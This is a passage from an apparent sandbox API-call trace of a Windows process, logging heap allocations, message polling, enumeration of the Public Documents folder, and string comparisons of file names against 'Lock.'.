hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.995] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0266.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.999] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.999] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.999] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0266.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0267.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0267.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0267.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0267.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0267.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0267.000] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9d7004d, dwReserved1=0x40, cFileName=".", cAlternateFileName="")) returned 0xaa5760 [0267.001] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9d7004d, dwReserved1=0x40, cFileName="..", cAlternateFileName="")) returned 1 [0267.001] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x9d7004d, dwReserved1=0x40, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0267.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0267.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.001] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.001] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0267.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.002] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.002] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.002] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.002] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0267.002] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.003] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.003] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x25c6e50, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0267.003] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.003] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0267.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.004] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0267.004] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.004] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.004] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x25c6e50, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0267.004] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.004] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.005] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0267.005] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.005] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.006] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x25c6e50, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0267.006] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.006] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.006] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0267.006] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.007] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.007] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x25c6d68, ftCreationTime.dwHighDateTime=0x25c6a58, ftLastAccessTime.dwLowDateTime=0x10, ftLastAccessTime.dwHighDateTime=0x24b2088, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x240d650, nFileSizeHigh=0x25c6a58, nFileSizeLow=0x25c6b70, dwReserved0=0x24a9d68, dwReserved1=0x25c6e50, cFileName="\x25b9\x34\xf1dc\x8b\x17fd\x02\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\xe36c\x7715\xe0d2\x7715\x9870\x24a\x9dc8\x24a\x10", cAlternateFileName="\x8e1a\x40\x8154\x241\xf47c\x8b\x8614\x4a\x3cfb\x40\x8178\x4a\xf580\x8b\xf484\x8b\x3d76\x40\xf4a0\x8b\xf580\x8b\x85f4\x4a\x61")) returned 0 [0267.007] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.007] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.007] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0267.008] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.008] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0267.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, 